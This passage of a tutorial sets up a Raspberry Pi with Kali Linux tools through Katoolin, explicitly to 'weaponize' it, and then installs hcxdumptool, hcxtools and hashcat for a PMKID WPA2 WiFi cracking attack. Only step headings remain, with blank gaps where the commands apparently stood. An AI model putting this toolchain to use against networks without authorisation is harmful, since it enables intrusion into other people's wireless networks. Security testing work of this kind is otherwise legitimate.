Step 3: Change Password

3.1 Change the default password “raspberry”





Step 4: Upgrade And Update The System And Install Pixel desktop

4.1 Upgrade and update Rasbian





4.2 Update dependence



4.3 Install Pixel desktop



Step 5: Change Hostname

5.1 Edit hostname configuration file and change the name







Exit & Save

5.2 Edit the hosts configuration file







Exit & Save

5.3 Reboot the system



5.4 Confirm name change





Step 6: Configure WiFi Connection

6.1 Configure the wpa_supplicant configuration file from cli





Exit & Save

6.2 Reload the wpa_supplicant.conf configuration file



6.2 Confirm that you are connected to the WiFi network





Step 7: Enable VNC For Remote Access to Desktop

7.1 Open terminal and run raspi-config



7.2 Select Option 5 (Interfacing Options)

7.3 Then P3 VNC

7.4 Select yes to enable VNC

7.5 Wait for it to install all the necessary packages,

7.6 Reboot the Raspberry



7.7 Connect to raspberry from a VNC client

Step 8: Use Katoolin To Install Kali Linux Tools

8.1 Run commands in root privileges



8.2 Install git



8.3 Download Katoolin with git or visit the site

https://github.com/LionSec/katoolin



8.4 Make the file executable



8.5 Run Katoolin, make sure to run it as root



Step 9: Add Kali Linux Repositories And Installs Attack Modules

9.1 Add Kali repositories and update the system, navigate thee system by typing “back” or “gohome”

9.2 Install the Kali menus and exit Katoolin

9.3 Edit the sources.list, add entry for Kali repository to make them trusted





9.4 Start Katoolin and add attack categories, weaponize the Raspberry

Step 10: Install Tools For PMKID WPA2 Attack

10.1 Install dependence





10.2 Download hcxdumptool, hcxtools and hashcat







10.3 Install hcxdumptool



10.3.a Create the installation 



10.3.b Start the installation



10.4.a Install hcxtools



10.4.b Create the installation 



10.4.c Start the installation



10.5.a Install hashcat



10.5.b Create the installation



10.5.c Start the installation